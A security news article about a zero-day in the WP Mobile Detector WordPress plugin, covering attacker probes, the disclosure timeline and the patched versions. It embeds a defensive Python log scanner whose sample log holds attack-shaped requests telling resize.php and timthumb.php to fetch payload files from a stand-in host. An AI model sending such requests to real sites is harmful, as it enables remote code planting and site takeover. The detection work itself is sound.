WordPress, the most widely used Content Management System (CMS), is most often compromised through flaws in its plugins. Recently a zero-day flaw in a WordPress plugin was detected that left over 10,000 websites vulnerable to exploitation.
Zero-Day Flaw in WordPress Plugin
Security researchers found a zero-day flaw in WP Mobile Detector, a WordPress plugin that automatically detects standard and advanced mobile devices and displays a compatible WordPress mobile theme.
The zero-day flaw was first disclosed by the Plugin Vulnerabilities team on May 31, who suspected that over 10,000 websites may have been affected by the flaw and were vulnerable to exploitation.
The security researchers became aware of a potential problem after receiving a HEAD request for a WP Mobile Detector file, blog/wp-content/plugins/wp-mobile-detector/resize.php, on a WordPress site which did not have the plugin installed.
The team investigated further and realized it was most likely that “someone was checking for the existence of the file before trying to exploit a vulnerability in the plugin.”
According to Sucuri, “the vulnerability is very easy to exploit, all the attacker needs to do is send a request to resize.php or timthumb.php, inside the plugin directory with the backdoor URL.”
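The two patterns described above (a probe for the plugin script on a site that does not run the plugin, and a request to resize.php or timthumb.php carrying an external URL) can be picked out of ordinary access logs. The following Python is an added detection example written for this article, not code from the plugin, Sucuri or the Plugin Vulnerabilities team; the log lines, IP addresses and the query parameter name in them are constructed.

```python
import re
from urllib.parse import urlsplit, parse_qs

# Plugin scripts named in the article; matched anywhere under the plugin directory
# so both the /blog/wp-content/... and /wp-content/... layouts are covered.
WATCHED_SCRIPTS = ("resize.php", "timthumb.php")
PLUGIN_DIR = "wp-content/plugins/wp-mobile-detector/"

# Apache/nginx Common Log Format: client, identd, user, [timestamp], "METHOD target proto", status
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" (?P<status>\d{3})')

# Constructed sample log (documentation IP ranges; the "src" parameter name is assumed).
SAMPLE_LOG = """\
203.0.113.5 - - [31/May/2016:10:01:02 +0000] "HEAD /blog/wp-content/plugins/wp-mobile-detector/resize.php HTTP/1.1" 404 0
203.0.113.5 - - [31/May/2016:10:01:09 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=http://203.0.113.77/payload.txt HTTP/1.1" 200 512
198.51.100.2 - - [31/May/2016:10:02:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/timthumb.php?src=https://203.0.113.77/x.php HTTP/1.1" 200 512
198.51.100.9 - - [31/May/2016:10:03:00 +0000] "GET /wp-content/plugins/wp-mobile-detector/resize.php?src=wp-content/uploads/a.png HTTP/1.1" 200 2048
192.0.2.10 - - [31/May/2016:10:04:00 +0000] "GET /index.php HTTP/1.1" 200 4096
"""

def classify(line, plugin_installed=True):
    """Return 'probe', 'remote-url' or None for one access-log line.

    probe      : any request for the plugin script on a site that does not run the plugin
                 (the reconnaissance the Plugin Vulnerabilities team observed)
    remote-url : request to resize.php/timthumb.php whose query string carries an
                 http(s) URL, the shape of the file-fetch abuse Sucuri described
    """
    m = LOG_RE.match(line)
    if not m:
        return None
    parts = urlsplit(m.group("target"))
    if PLUGIN_DIR not in parts.path or not parts.path.endswith(WATCHED_SCRIPTS):
        return None
    if not plugin_installed:
        return "probe"
    # The article does not name the parameter, so every query value is inspected.
    for values in parse_qs(parts.query, keep_blank_values=True).values():
        if any(v.lower().startswith(("http://", "https://")) for v in values):
            return "remote-url"
    return None

def scan(log_text, plugin_installed=True):
    """Map each flagged line number (1-based) to its finding label."""
    findings = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        label = classify(line, plugin_installed)
        if label:
            findings[n] = label
    return findings

if __name__ == "__main__":
    for n, label in scan(SAMPLE_LOG).items():
        print(f"line {n}: {label}")
```

Run with plugin_installed=False on a site that never had WP Mobile Detector, and every hit on the plugin path is reconnaissance worth correlating with later requests from the same client.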
The team behind WP Mobile Detector was informed of the zero-day flaw on 29 May, and the wordpress.org Plugin Directory was notified two days later, leading to the temporary removal of the plugin.
On 31 May, the developers patched the issue and the plugin was restored to the directory. Users should update to version 3.6 or 3.7, neither of which is vulnerable to attacks exploiting this flaw.